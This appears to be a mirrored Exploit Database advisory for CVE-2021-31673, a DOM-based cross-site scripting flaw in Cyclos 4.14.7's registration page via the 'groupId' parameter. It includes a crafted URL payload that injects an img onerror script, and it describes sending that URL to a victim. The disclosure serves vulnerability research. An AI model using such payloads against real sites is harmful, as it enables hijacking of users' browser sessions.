Cyclos 4.14.7 – ‘groupId’ DOM Based Cross-Site Scripting (XSS)

• Exploit Database
• 19 阅读

• 作者： Tin Pham
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50909/

• # Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
  # Date: 17/04/2021
  # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
  # Vendor Homepage: https://www.cyclos.org/
  # Version: Cyclos 4.14.7 (and prior)
  # Tested on: Ubuntu
  # CVE : CVE-2021-31673
  
  # Description: 
  A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
  
  # Steps to reproduce: 
  An attacker sends a draft URL
  
  [IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
  
  When a victim opens the URL, XSS will be triggered.